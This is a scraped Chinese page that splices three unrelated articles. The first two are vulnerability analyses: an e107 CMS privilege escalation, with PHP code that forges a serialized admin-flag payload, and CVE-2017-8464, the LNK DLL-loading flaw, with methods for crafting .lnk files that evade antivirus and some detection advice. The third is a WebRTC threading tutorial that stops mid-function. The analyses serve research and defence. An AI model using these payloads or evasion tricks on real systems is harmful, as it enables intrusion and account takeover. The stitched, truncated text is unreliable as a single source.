整合营销服务商

电脑端+手机端+微信端=数据同步管理

免费咨询热线:

e107 CMS 小于等于2.1.2 权限提升漏洞分

e107 CMS 小于等于2.1.2 权限提升漏洞分析

译:西风微雨

预估稿费:100RMB(不服你也来投稿啊!)

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

0x00 漏洞背景


e107 CMS是一个基于PHP、Bootstrap、Mysql的网站内容管理系统,可广泛用于个人博客、企业建站,在全球范围内使用较为广泛。

0x01 漏洞影响版本


version <=2.1.2

0x02 漏洞分析环境


运行环境:macOS10.12.2 + apache2.4.23 + PHP5.6.27 + Mysql5.7.16

e107 CMS版本:v2.1.2

0x03 漏洞详情


首先我们从rips的扫描报告https://blog.ripstech.com/2016/e107-sql-injection-through-object-injection/中可以大致知道整个漏洞的触发是利用反序列化漏洞来进行数据库数据修改,进一步进行权限提升。 接下来,我们就来对整个触发流程进行分析:

1.首先我们注册普通用户test2,原始邮箱地址为test22@1.com;我们可以看到user_admin字段为0(e107 CMS以user_admin字段标示用户权限,1为管理员,0为普通用户),因此test2是普通用户;接下来我们进入/e107/usersettings.php修改邮箱

2.反序列化漏洞及数据库注入漏洞代码跟踪

变量关系注释:$_POST[‘updated_data’]为base64编码的值,$new_data是base64解码后的值是一个序列化的值,$changedUserData为反序列化后的值,是一个数组。

首先跟进usersettings.php 353-387行的代码

123353 $new_data=base64_decode($_POST['updated_data']); ...387 $changedUserData=unserialize($new_data);

353行中用户可控变量$_POST['updated_data']未经进一步处理就直接在387行中进行了反序列化,并将数据赋值给$changedUserData变量,以便进一步操作.

继续跟进$changedUserData变量

123455 $changedData['data']=$changedUserData; ...460 if (FALSE===$sql->update('user', $changedData))

$changedUserData变量在460行进入mysql类方法,跟进/e107_handlers/mysql_class.php中的update函数

12341160 function update($tableName, $arg, $debug=FALSE, $log_type='', $log_remark='') {1162 $arg=$this->_prepareUpdateArg($tableName, $arg); ...1183 $result=$this->mySQLresult=$this->db_Query($query, NULL, 'db_Update');

跟进_prepareUpdateArg函数

1234567891083 private function _prepareUpdateArg($tableName, $arg) {1084 ...1085 foreach ($arg[‘data’] as $fn=> $fv) {1086 $new_data .=($new_data ? ', ' : '');1087 $ftype=isset($fieldTypes[$fn]) ? $fieldTypes[$fn] : 'str';1088 $new_data .="{$fn}=".$this->_getFieldValue($fn, $fv, $fieldTypes);1089 ...1090 }1091 return $new_data .(isset($arg[‘WHERE’]) ? ' WHERE '. $arg['WHERE'] : '');

跟进_getFieldValue函数

1234561247 function _getFieldValue($fieldKey, $fieldValue, &$fieldTypes) {1248 $type=isset($fieldTypes[$fieldKey]) ? $fieldTypes[$fieldKey] : $fieldTypes['_DEFAULT'];1249 switch ($type) {1250 case 'str':1251 case 'string':1252 return "'".$this->escape($fieldValue, false)."'";

可以看出$changedUserData变量仅仅被拆分开来,而没有做进一步校验是否有恶意参数,因此只要$changedUserData中包含恶意的user表字段,便能够任意修改数据表中的值。

3.漏洞利用

首先我们来看看测试正常修改邮箱的数据格式,测试更改邮箱为22test2@1.com

这里就可以清楚地看到,$new_data变量为被修改数据序列化的值,$changedUserData$new_data反序列化后的值,数据校验成功后,$changedUserData就会被拆分,然后进入$sql->update函数执行,进而任意修改数据库数据。

那么,我们如何利用这个漏洞链呢?

要做到提权操作,我们就需要更新test2用户的user_admin字段,并且在修改$new_data变量的值后,必须顺利通过usersetings.php的两个if语句检查:

123358 if (md5($new_data) !=$_POST['updated_key'] || ($userMethods->hasReadonlyField($new_data) !==false)) ...366 if (md5($new_extended) !=$_POST['extended_key'])

从358行来看,我们在抓包修改$_POST['updated_data']的同时需要修改掉$_POST['updated_key'],使之满足md5值校验。 我使用如下的php代码生成update_keyupdated_data

123456/* php code */$a=array('user_email'=>'2test2@1.com','user_admin'=>1);$b=serialize($a);echo 'updated_data is: '.$b;echo 'update_key is : '.md5($b);/* php code */

接下来使用burpsuite抓包修改$_POST['updated_data']为以及$_POST['update_key'](注意:e107 在修改邮箱时会验证密码,我们只修改校验了密码之后的数据包,如下图:)

成功反序列化:

查看数据库字段,发现test2用户的user_admin字段已经被成功修改为1,权限提升成功

test2用户成功进入后台管理面板:

0x04 漏洞修复


升级e107 CMS至2.1.3版本

0x05 漏洞总结


此漏洞的修复过程也有些许奇妙,Kacper Szurek安全研究员早在2016年6月就在2.1.1版本发现了此漏洞,官方多次修复均被饶过,并且在2.1.2版本中仍未修复,或许官方暂未找到更好的修复方法,此漏洞便一度被搁置;直到2016年11月RIPS再次报告漏洞,官方终于在2.1.3版本的修复中完全重写了usersettings.php文件,以修复包括此漏洞在内的多个漏洞。 另外,此篇文章在我的个人博客中也有备份:https://lightrains.org/e107-cms-privilege-escalation/。

0x06 参考链接


https://blog.ripstech.com/2016/e107-sql-injection-through-object-injection/

http://security.szurek.pl/e107-cms-211-privilege-escalation.html

https://github.com/e107inc/e107/commit/6a306323d4a14045d9ee4fe80f0153a9555fadff#diff-dbac6e5a7c66d48e23884c0968e6dad7

https://github.com/e107inc/e107/commit/0af67301ea2743536ba8f3fe74751e000e3f495d#diff-dbac6e5a7c66d48e23884c0968e6dad7

https://github.com/e107inc/e107/commit/dd2cebbb3ccc6b9212d64ce0ec4acd23e14c527


0x01 概述

2017年6月份微软补丁发布了一个针对Windows系统处理LNK文件过程中发生的远程代码执行漏洞,通用漏洞编号CVE-2017-8464。 当存在该漏洞的电脑被插上存在漏洞文件的U盘时,不需要任何额外操作,漏洞攻击程序就可以借此完全控制用户的电脑系统。同时,该漏洞也可借由用户访问网络共享、从互联网下载、拷贝文件等操作被触发和利用攻击。

与2015年的CVE-2015-0096上一代相比,CVE-2017-8464利用触发更早,更隐蔽。

早,指的是U盘插入后即触发,而前代需要在U盘插入后浏览到.lnk文件。

隐蔽,指的是本代.lnk文件可以藏在层层(非隐藏的)文件夹中,不需要暴露给受害人见到。

程序层面讲,CVE-2015-0096利用点是在explorer需要渲染.lnk文件图标时,而CVE-2017-8464利用点在于.lnk文件本身被预加载时显示名的解析过程中。

本文中,笔者将对这两个漏洞从漏洞的复现和反漏洞技术检测的防御角度进行剖析。本文是笔者在2017年6月份,没有任何PoC的情况下作的一个探索。

0x02 CVE-2017-8464原理

CVE-2017-8464利用能够成功实现基于以下3点:

  1. 对控制面板对象的显示名解析未严格认证此对象是否为已注册的控制面板应用。
  2. 恶意构造的.lnk文件能够实现使explorer注册一个临时控制面板应用对象。
  3. 如上.lnk文件能够将步骤2中注册的临时对象的随机GUID值传输至步骤1所述之处进行解析。

本次利用原理就是由于在解码特殊文件夹时,能够有机会按上述3点完成触发。

细节见0x02节。

(显示名解析,参见IShellFolder:: ParseDisplayName, 以及shell对外的接口SHParseDisplayName。)

0x03 还原

首先,猜下问题点出现在 shell32.dll 中。

通过diff比对分析,可以得知问题点有极大概率是存在于函数 CControlPanelFolder::_GetPidlFromAppletId 中的如下代码:

易知 CControlPanelFolder::_GetPidlFromAppletId 的上层函数是 CControlPanelFolder::ParseDisplayName。

看名字大约理解为解析显示名,这很容易关联到shell提供的接口 SHParseDisplayName,查MSDN可知此函数的功能是把shell名字空间对象的显示名(字符串)转换成PIDL(项目标识符列表的指针,我更喜欢称其为对象串烧)。

(那么PIDL大约长这样子:2-bytes length, (length-2) bytes contents, 2-bytes length, (length-2) bytes contents, …, 2-bytes length(=0)。实例:04 00 41 41 03 00 41 00 00 )

shell32.dll 中调用 SHParseDisplayName 的地方有很多,先验证下从 SHParseDisplayName 能否连通到目标 CControlPanelFolder::ParseDisplayName。(另外 shell32里还有个 ParseDisplayNameChild 效用也是差不多)

建立一个例子小程序工程,代码大概如下:

至于填充names的素材,网上可以搜索到很多,注册表里也容易找到不少:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions

这个地方似乎有不错的货源:https://wikileaks.org/ciav7p1/cms/page_13762807.html

调试发现类似这样的名字可以满足要求:

L"::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\C:\stupid.dll"

如第一张图片中,把想要加载的动态库路径传入到 CPL_LoadCPLModule 就成功了。但这里,虽然从 SHParseDisplayName 出发,就能把文件路径送到 CControlPanelFolder::ParseDisplayName -> CControlPanelFolder::_GetPidlFromAppletId。但 CControlPanelFolder::_GetPidlFromAppletId 之前还有 CControlPanelFolder::_GetAppletPathForTemporaryAppId 这一头拦路虎:

这段代码的大概意思是要检查一下传过来的名字是否在它的临时应用识别列表里面,若是则返个对应的路径名回来(显示名<->实际路径)。

跟一下,发现它要对比的检查项,是一个GUID。

通过 CControlPanelFolder::s_dsaTemporaryAppId 这个标识符,容易得知,这个GUID是仅在 CControlPanelFolder::_GetTemporaryAppIdForApplet 中随机生成的:

这就尴尬了,也就是说,我们用 SHParseDisplayName 把动态库路径直接传到这里是不行的。我们需要先去触发CControlPanelFolder::_GetTemporaryAppIdForApplet函数,然后再把GUID替换掉动态库路径,再传过来。

就是说,如果我们先调用某个函数以参数L"::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\C:\stupid.dll" 触发 CControlPanelFolder::_GetTemporaryAppIdForApplet,并从explorer内存中”偷”到那个随机GUID。再以 L"::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\{{GUID}}" 为参数调用 SHParseDisplayName,就可以成功加载stupid.dll(如果C盘根目录真的有)了。

好吧,那么就来看看哪个函数可以先行触发CControlPanelFolder::_GetTemporaryAppIdForApplet 来添加随机GUID。

容易得到它的上层函数是 CControlPanelFolder::GetDetailsEx。

在之前的分析过程中,有个猜测: CRegFolder 似乎是一系列 CxxxFolder 类的分发类,可以在 CControlPanelFolder::GetDetailsEx 和 CRegFolder 同名类函数上下断,搞几下就能得到一票撞过来的断点。

栈回溯中最惹眼的显然就是DisplayNameOfW了。

深入一下,发现它确实就是我们要找的火鸡!(或者SHGetNameAndFlagsW?先不关注)

那么,现在如果能结合 DisplayNameOfW 和 SHParseDisplayName,应该就能实现我们的目标,把.lnk中指定的.dll跑起来了。

不妨写个小程序验证一下是否属实:

其中ucIDList就是L"::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\C:\stupid.dll" 转换成PIDL的样子。

DisplayNameOfW 参数 0x8001 表示返回目标路径,0x8000 表示返回全路径。

跑起来有点小意外,stupid并没有被加载。

原因是加载之前有一段代码检测 PSGetNameFromPropertyKey(&PKEY_Software_AppId, &ppszCanonicalName); 是否成功。在explorer里这句是成功的,自己的小程序load shell32.dll跑则失败。

好吧,这不是重点。那么把这段程序load到explorer里去跑下,果然成功了,stupid.dll被加载。或者在 PSGetNameFromPropertyKey 下断,把返回值改为0,也可以成功跑出stupid。

至此,我们知道,只要能来一发 DisplayNameOfW + SHParseDisplayName 连续技,就可以成功利用。

接下来就是寻找哪里可以触发连续技。

DisplayNameOfW的调用点也是蛮多,排除掉一眼看上去就不靠谱的,再把二眼看上去犹疑的踢到次级优先梯队,还剩下这么些需要深入排查的:

然而逐一鉴定后,发现一个都不好使,再把第二梯队拉出来溜一圈,依然不好使。

那么,再看看有关联但之前暂不关注的SHGetNameAndFlagsW吧,另外又一个功能也差不多的DisplayNameOfAsString 也一并进入视野(在分析CShellLink::_ResolveIDList时,这里面就能看到DisplayNameOfAsString,也有 ParseDisplayNameChild。这里面花了很大功夫,然而这里的GetAttributesWithFallback 函数要求满足属性值存在0x40000000位这个条件无法通过。最后不得不转移阵地。另外其实即使这里能跑通,这个函数也不是插入U盘就能立刻触发的,还是需要一定操作。)。

SHGetNameAndFlagsW,这个函数调用点很多,又花了很多时间,然而并没有惊喜。

好在DisplayNameOfAsString的调用点不多,才十多个,并且终于在这里见到了彩头。

可以回溯了:

DisplayNameOfAsString <- ReparseRelativeIDList <- TranslateAliasWithEvent <- TranslateAlias<- CShellLink::_DecodeSpecialFolder <- CShellLink::_LoadFromStream <- CShellLink::Load

就是说,加载 .lnk 文件即触发!

一如既往,再写个小程序测试一下。如料触发:

接下来,按 CShellLink::_LoadFromStream 和 CShellLink::_DecodeSpecialFolder中的判断,制作出 .lnk 文件,就比较轻松愉快了。

0x04 CVE-2017-8464变形

研究发现,目前多数安全软件对利用的检测还不够完善,几种变形手段都可以逃过包括微软 Win10 Defender 在内的安全软件的检测。

1、 LinkFlag域变形

可以添加和改变各bit位包括unused位来逃避固定值检测。

事实上,所有高依赖此域的检测,都是可以被绕过的。

2、 LinkTargetIDList域变形

::{20D04FE0-3AEA-1069-A2D8-08002B30309D}(我的电脑)由SHParseDisplayName解析对应的 PIDL 内容是 0x14, 0x00, 0x1f,0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08,0x00, 0x2b, 0x30, 0x30, 0x9d

因此 .lnk 利用文件LinkInfo域通常第一项IDList项就是这个值,但其实第[3]号字节值是可以改的,并且不影响结果。

小程序一试便知:

同理,第二段 ::{21EC2020-3AEA-1069-A2DD-08002B30309D}(控制面板项)对应的PIDL内容也可以这样变形。

这样,所有精确检测LinkInfo域的安全软件也被绕过了。

3、 SpecialFolderDataBlock域变形

研究发现有的安全软件会检查SpecialFolderID值,然而这个值也是可以变的。

4、 去掉LinkTargetIDList

研究发现,LinkFlag bit0 位清0,这让所有以此为必要条件的安全软件都失效了。但这个方法在Vista及更高版本的Windows系统才有效。

0x05 CVE-2017-8464检测

那么,安全软件应该如何检测?

1、 对PIDL的检测要mask掉特殊项的[3]号字节。

更为稳妥的方法是调用 DisplayNameOf 检测其结果(相当于检查DisplayName,也就是那个”::{…..}” 字符串)。

2、 LinkFlag域只看bit0和bit7位。bit0位为1检查LinkTargetIDList,为0检查 VistaAndAboveIDListDataBlock。

0x06 关于CVE-2015-0096

简单回顾下前代CVE-2015-0096利用:

与CVE-2015-0096比较,CVE-2017-8464 的分析过程没有特别难点,就作业量而言,CVE-2015-0096 要小很多,但需要灵光一现,巧用一长名一短名双文件和恰好的切分过3处检测。

问题在这里:

CControlPanelFolder::GetUIObjectOf函数中这段处理不当,Start长度限定在0x104,但v15为0x220,在ControlExtractIcon_CreateInstance中进行CCtrlExtIconBase::CCtrlExtIconBase初始化时又会截断为0x104,并且里面没有判断返回值。

意味着v14以%d输入的 “-1″值,我们可以通过增加 Start的长度到0x101,使得CCtrlExtIconBase初始化对象名最终尾部变成”xxxxx,-“的样子。

但这里的CControlPanelFolder::GetModuleMapped函数判断了大长名文件的存在性,所以这个文件一定要真的存在才行。

这样就能通过 CCtrlExtIconBase::_GetIconLocationW 中的检测,因为StrToIntW(L”-“)=0,从而调用到CPL_FindCPLInfo:

接着,在CPL_FindCPLInfo -> CPL_ParseCommandLine -> CPL_ParseToSeparator 中我们又可以将上面使用过的大长文件名截断为短文件名,因为 CPL_ParseToSeparator 中除了使用”,”作为分割符,也是包含了空格符。

切成短名字,是为了过 CPL_LoadCPLModule 函数中的:

这里有返回值检查,超长的话就返回了。

我们的0x101长度名字,是不能在尾部附加一串”.manifest”的。

过了它,我们的短名dll(如果存在的话)就真的被加载起来了。

所以,这个利用需要用到一长名一短名双文件技巧。

长名文件任意内容,0字节都可以,只是被检测一下存在性。

比如:

3.dll
3333333300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000

(注意dll后面有个空格)

短名文件(真正加载的就是它了):3.dll

.lnk里指定那个长名字就好了。

Hf,全文完!

原文链接:https://www.anquanke.com/post/id/202705

ebRTC的线程管理

为什么是从线程开始切入整个WebRTC源码?相信只要对WebRTC有一定的了解的都清楚WebRTC内部有着自己的一套线程管理机制,WebRTC通过这套线程管理机制,非常简单就达到了多线程安全编码的目的,并且给每个线程划分属于自己的职责,方便后续维护、阅读代码 (当然,WebRTC的线程管理和Chromium、Flutter都非常相似),如果你不了解WebRTC的这套线程管理机制,阅读WebRTC代码会很懵逼,又因为线程管理并不会涉及到一些专业性知识,非常适合作为切入WebRTC源码的起点。

WebRTC代码逻辑主要通过三个线程管理(这里不介绍一些编解码线程):

  • network_thread: 网络线程,一切涉及到耗时的网络操作都在这个线程处理
  • worker_thread: 工作者线程,主要负责逻辑处理,比如一些初始化代码,还有比如在网络线程接收到数据然后会传递给工作者线程进行一些数据处理然后传给解码器线程
  • signal_thread: 信令线程,信令线程通常都是工作在PeerConnect层的,也就是我们绝大部分者调用的API都必须在信令线程,比如AddCandidate、CreateOffer等,WebRTC为了让绝大部分API都运行在信令线程,还专门做了一层Proxy层,强制将API的调用分配到信令线程(后面如果有机会,可以分析以下WebRTC的Proxy层实现原理)


WebRTC线程之间的任务投递

WebRTC线程之间的任务(这里的任务主要指的是函数)投递主要有两种方式

  • 同步Invoke机制,通过这个机制可以将任务指定到某个线程运行,调用Invoke API的线程将会同步等待任务执行完成
  • 异步Post机制,通过这个机制也可以将任务指定到某个线程运行,但是调用PostTask API的线程不会同步等待


Invoke机制,代码如下:

// 比如NeedsIceRestart函数是在工作者线程被调用,那么network_thread()->Invoke将会将
// lambda匿名函数从工作者线程派遣到网络线程,并等待执行完成
bool PeerConnection::NeedsIceRestart(const std::string& content_name) const {
  return network_thread()->Invoke<bool>(RTC_FROM_HERE, [this, &content_name] {
    RTC_DCHECK_RUN_ON(network_thread());
    return transport_controller_->NeedsIceRestart(content_name);
  });
}

PostTask机制,代码如下:

// 同Invoke机制不同的是,调用完PostTask之后不用等待任务执行完成
void EmulatedNetworkManager::EnableEndpoint(EmulatedEndpointImpl* endpoint) {
  network_thread_->PostTask(RTC_FROM_HERE, [this, endpoint]() {
    endpoint->Enable();
    UpdateNetworksOnce();
  });
}

WebRTC线程实现细节分析 - Thread

注意:源码版本 M92

线程启动流程

先从WebRTC的信令、工作者、网络线程的创建开始

file://src/http://pc_connection_context.cc:81

ConnectionContext::ConnectionContext(
    PeerConnectionFactoryDependencies* dependencies)
    : network_thread_(MaybeStartThread(dependencies->network_thread,
                                       "pc_network_thread",
                                       true,
                                       owned_network_thread_)),
      worker_thread_(MaybeStartThread(dependencies->worker_thread,
                                      "pc_worker_thread",
                                      false,
                                      owned_worker_thread_)),
      signaling_thread_(MaybeWrapThread(dependencies->signaling_thread,
                                        wraps_current_thread_)) {

}

通过MabeStartThread函数初始化了工作者、网络线程,信令线程比较特殊一点,是由于信令线程可以直接托管进程中的主线程(准确来说应该是当前调用线程),所以调用的函数是MaybeWrapThread

MaybeStartThread

file://src/http://pc_connection_context.cc:27

rtc::Thread* MaybeStartThread(rtc::Thread* old_thread,
                              const std::string& thread_name,
                              bool with_socket_server,
                              std::unique_ptr<rtc::Thread>& thread_holder) {
  if (old_thread) {
    return old_thread;
  }
  if (with_socket_server) {
    thread_holder=rtc::Thread::CreateWithSocketServer();
  } else {
    thread_holder=rtc::Thread::Create();
  }
  thread_holder->SetName(thread_name, nullptr);
  thread_holder->Start();
  return thread_holder.get();
}

暂时忽略with_socket_server,后面会说明CreateWithSocketServer,MaybeStartThread整体流程

  1. old_thread如果不为空直接返回,由于WebRTC的这三个线程都是可以由外部自定义的,所以如果外部有传入自定义线程,后续线程创建操作将不会进行
  2. 调用rtc::Thread::Create
  3. 调用rtc::Thread::SetName
  4. 调用rtc::Thread::Start
  5. 线程启动完成

相关学习资料推荐,点击下方链接免费报名,先码住不迷路~】

音视频免费学习地址:FFmpeg/WebRTC/RTMP/NDK/Android音视频流媒体高级开发

【免费分享】音视频学习资料包、大厂面试题、技术视频和学习路线图,资料包括(C/C++,Linux,FFmpeg webRTC rtmp hls rtsp ffplay srs 等等)有需要的可以点击788280672加群免费领取~

MaybeWrapThread

file://src/http://pc_connection_context.cc:44

rtc::Thread* MaybeWrapThread(rtc::Thread* signaling_thread,
                             bool& wraps_current_thread) {
  wraps_current_thread=false;
  if (signaling_thread) {
    return signaling_thread;
  }
  auto this_thread=rtc::Thread::Current();
  if (!this_thread) {
    // If this thread isn't already wrapped by an rtc::Thread, create a
    // wrapper and own it in this class.
    this_thread=rtc::ThreadManager::Instance()->WrapCurrentThread();
    wraps_current_thread=true;
  }
  return this_thread;
}

如果外部没有传入signaling_thread,内部将会获取当前线程作为signaling_thread
rtc::Thread::Start流程

  1. 调用ThreadManager::Instance() 初始化ThreadManager对象
  2. windows上调用CreateThread,linux调用pthread_create创建线程
  3. 进入线程处理函数Thread::PreRun
  4. 调用Thread::Run函数
  5. Thread::Run函数调用ProcessMessage函数


ProcessMessage

file://src/rtc_base/http://thread.cc:1132

bool Thread::ProcessMessages(int cmsLoop) {
  //...
  int64_t msEnd=(kForever==cmsLoop) ? 0 : TimeAfter(cmsLoop);
  int cmsNext=cmsLoop;

  while (true) {
#if defined(WEBRTC_MAC)
    ScopedAutoReleasePool pool;
#endif
    Message msg;
    if (!Get(&msg, cmsNext))
      return !IsQuitting();
    Dispatch(&msg);

    if (cmsLoop !=kForever) {
      cmsNext=static_cast<int>(TimeUntil(msEnd));
      if (cmsNext < 0)
        return true;
    }
  }
}

主要逻辑如下:函数通过一个while循环处理消息,每次循环都会通过Get获取一个可用的Message,然后调用Dispatch派遣获取到的Message,两个主要函数Dispatch、Get。到这里整个WebRTC线程的初始化和启动流程就介绍完了

消息获取、派遣、投递分析

上面的ProcessMessages,可以把它当成一个消息循环,循环中每次都会通过Get函数去获取消息

Get (消息获取)

file://src/rtc_base/http://thread.cc:472

bool Thread::Get(Message* pmsg, int cmsWait, bool process_io) {
   // ......

  // Get w/wait + timer scan / dispatch + socket / event multiplexer dispatch

  int64_t cmsTotal=cmsWait;
  int64_t cmsElapsed=0;
  int64_t msStart=TimeMillis();
  int64_t msCurrent=msStart;
  while (true) {
    // Check for posted events
    int64_t cmsDelayNext=kForever;
    bool first_pass=true;
    while (true) {
      // All queue operations need to be locked, but nothing else in this loop
      // (specifically handling disposed message) can happen inside the crit.
      // Otherwise, disposed MessageHandlers will cause deadlocks.
      {
        CritScope cs(&crit_);
        // On the first pass, check for delayed messages that have been
        // triggered and calculate the next trigger time.
        if (first_pass) {
          first_pass=false;
          while (!delayed_messages_.empty()) {
            if (msCurrent < delayed_messages_.top().run_time_ms_) {
              cmsDelayNext=          TimeDiff(delayed_messages_.top().run_time_ms_, msCurrent);
              break;
            }
            messages_.push_back(delayed_messages_.top().msg_);
            delayed_messages_.pop();
          }
        }
        // Pull a message off the message queue, if available.
        if (messages_.empty()) {
          break;
        } else {
          *pmsg=messages_.front();
          messages_.pop_front();
        }
      }  // crit_ is released here.

      // If this was a dispose message, delete it and skip it.
      if (MQID_DISPOSE==pmsg->message_id) {
        RTC_DCHECK(nullptr==pmsg->phandler);
        delete pmsg->pdata;
        *pmsg=Message();
        continue;
      }
      return true;
    }

    if (IsQuitting())
      break;

    // Which is shorter, the delay wait or the asked wait?

    int64_t cmsNext;
    if (cmsWait==kForever) {
      cmsNext=cmsDelayNext;
    } else {
      cmsNext=std::max<int64_t>(0, cmsTotal - cmsElapsed);
      if ((cmsDelayNext !=kForever) && (cmsDelayNext < cmsNext))
        cmsNext=cmsDelayNext;
    }

    {
      // Wait and multiplex in the meantime
      if (!ss_->Wait(static_cast<int>(cmsNext), process_io))
        return false;
    }

    // If the specified timeout expired, return

    msCurrent=TimeMillis();
    cmsElapsed=TimeDiff(msCurrent, msStart);
    if (cmsWait !=kForever) {
      if (cmsElapsed >=cmsWait)
        return false;
    }
  }
  return false;
}

核心是通过一个循环来获取一个有效的消息,循环会在Get成功、失败或者外部调用了Stop停止了线程时结束。
消息的获取机制

  • 尝试获取延迟消息,延迟消息列表使用优先级列队存储,如果延迟消息到达运行时间,延迟消息将会从消息消息优先级队列出列,并将延迟消息加入可执行消息队列
  • 判断可执行消息队列是否存在消息,如果存在从队列头部取出一个消息返回给外部
  • 如果可执行消息队列为空,进行Wait操作,等待消息到来触发WakeUp,这里的Wait和WakeUp使用的是SocketServer对象,后面专门分析SocketServer的Wait和wakeUp原理


可能在一开始看代码会对获取可用延迟消息产生疑问,为什么只判断延迟消息队列的第一个元素的运行时间有没有到达,难道队列后面的消息不会有比这个顶部消息的运行时间更小的吗?

while (!delayed_messages_.empty()) {
    if (msCurrent < delayed_messages_.top().run_time_ms_) {
        cmsDelayNext=    TimeDiff(delayed_messages_.top().run_time_ms_, msCurrent);
        break;
    }
    messages_.push_back(delayed_messages_.top().msg_);
    delayed_messages_.pop();
}

进一步查看delayed_messages_的定义PriorityQueue delayed_messages_ RTC_GUARDED_BY(crit_);

  // DelayedMessage goes into a priority queue, sorted by trigger time. Messages
  // with the same trigger time are processed in num_ (FIFO) order.
  class DelayedMessage {
   public:
    DelayedMessage(int64_t delay,
                   int64_t run_time_ms,
                   uint32_t num,
                   const Message& msg)
        : delay_ms_(delay),
          run_time_ms_(run_time_ms),
          message_number_(num),
          msg_(msg) {}

    bool operator<(const DelayedMessage& dmsg) const {
      return (dmsg.run_time_ms_ < run_time_ms_) ||
             ((dmsg.run_time_ms_==run_time_ms_) &&
              (dmsg.message_number_ < message_number_));
    }

    int64_t delay_ms_;  // for debugging
    int64_t run_time_ms_;
    // Monotonicaly incrementing number used for ordering of messages
    // targeted to execute at the same time.
    uint32_t message_number_;
    Message msg_;
  };

  class PriorityQueue : public std::priority_queue<DelayedMessage> {
   public:
    container_type& container() { return c; }
    void reheap() { make_heap(c.begin(), c.end(), comp); }
  };

延迟消息队列其实就是一个大项堆的优先级消息队列,也就是使用降序排序,DelayedMessage的大小比较是通过run_time_ms_参数,如果run_time_ms_越小其实DelayedMessage越大,如果run_time_ms_ 相等就使用message_number来比较,通俗说就是延迟时间越小在队列中越靠前。

Message介绍

在介绍消息派遣处理之前需要先弄清楚Message

file://src/rtc_base/thread_message.h

struct Message {
  Message() : phandler(nullptr), message_id(0), pdata(nullptr) {}
  inline bool Match(MessageHandler* handler, uint32_t id) const {
    return (handler==nullptr || handler==phandler) &&
           (id==MQID_ANY || id==message_id);
  }
  Location posted_from;
  MessageHandler* phandler;
  uint32_t message_id;
  MessageData* pdata;
};

主要看两个数据phander和pdata,对应类如下

class RTC_EXPORT MessageHandler {
 public:
  virtual ~MessageHandler() {}
  virtual void OnMessage(Message* msg)=0;
};

class MessageData {
 public:
  MessageData() {}
  virtual ~MessageData() {}
};

两个虚基类,MesageData用来存储消息的内容,MesageHandler用来处理消息,使用者可以自定义属于自己的MessageHanlder和MessageData,比如我们自定义一个自己的MessageData如下:

// 定义了一个自己的MyMessageTask,其中保存了一个function,并且对外提供了一个Run方法
template <class FunctorT>
class MyMessageTask final : public MessageData {
 public:
  explicit MessageWithFunctor(FunctorT&& functor)
      : functor_(std::forward<FunctorT>(functor)) {}
  void Run() { functor_(); }

 private:
  ~MessageWithFunctor() override {}

  typename std::remove_reference<FunctorT>::type functor_;
};

在自己定义一个MessageHandler用来处理消息

// OnMessage函数会在派遣消息的时候被调用,里面的msg存放着一个MessageData对象,这个MessageData对象就是我们自定义的MyMessageTask,获取到这个对象直接调用我们刚刚写好的Run函数运行。
class MyMessageHandlerWithTask : public MessageHandler {
  public:
    void OnMessage(Message* msg) overrider {
      static_cast<MyMesageTask*>(msg->pdata)->Run();
      delete msg->pdata;
    }
}

上面我们定义了一个handler和data,主要用来在收到派遣过来的消息时通过handler处理消息,来看看如何使用我们自定义的handler和data吧

// Thread::Post原型
virtual void Post(const Location& posted_from,
                  MessageHandler* phandler,
                  uint32_t id=0,
                  MessageData* pdata=nullptr,
                  bool time_sensitive=false);
// 注意看Post函数里面有需要我们传入MessageHandler和MessageData,我们只需要将自定义
// 的MessageHandler和MessageData传入即可
static MyMessageHandlerWithTask* myhandler=new MyMessageHandlerWithTask;
MyMessageTask* mytask=new MyMessageTask([]() {int c=a+b;});
Post(FROME_HERE, myhandler, 0, mytask);

执行完上面的Post,MyMessageTask里面的匿名函数将被执行

Dispatch (消息派遣)

介绍完Message,就可以看看Dispatch是如何将消息派遣到MessageHandler去处理的
file://src/rtc_base/http://thread.cc

void Thread::Dispatch(Message* pmsg) {
  TRACE_EVENT2("webrtc", "Thread::Dispatch", "src_file",
               pmsg->posted_from.file_name(), "src_func",
               pmsg->posted_from.function_name());
  RTC_DCHECK_RUN_ON(this);
  int64_t start_time=TimeMillis();
  pmsg->phandler->OnMessage(pmsg);
  int64_t end_time=TimeMillis();
  int64_t diff=TimeDiff(end_time, start_time);
  if (diff >=dispatch_warning_ms_) {
    RTC_LOG(LS_INFO) << "Message to " << name() << " took " << diff
                     << "ms to dispatch. Posted from: "
                     << pmsg->posted_from.ToString();
    // To avoid log spew, move the warning limit to only give warning
    // for delays that are larger than the one observed.
    dispatch_warning_ms_=diff + 1;
  }
}

Dispatch函数非常简单,抓住重点就是调用了传入的Message的OnMessage,将消息传递给MessageHandler去处理

消息的投递

前面有看了消息获取的实现原理,如果没有消息将会调用Wait进行等待,既然有Wait,那么肯定就有地方触发WaitUp,没错,就是在外部投递消息的时候会触发WaitUp, 在 WebRTC线程之间的任务投递中有介绍了两种方式,一种同步Invoke,一种异步Post

file://src/rtc_base/thread.h:449

  template <class FunctorT>
  void PostTask(const Location& posted_from, FunctorT&& functor) {
    Post(posted_from, GetPostTaskMessageHandler(), /*id=*/0,
         new rtc_thread_internal::MessageWithFunctor<FunctorT>(
             std::forward<FunctorT>(functor)));
  }

PostTask核心还是调用了Post函数,并且传入了属于自己的MessageData和MessageHandler

file://src/rtc_base/http://thread.cc:563

void Thread::Post(const Location& posted_from,
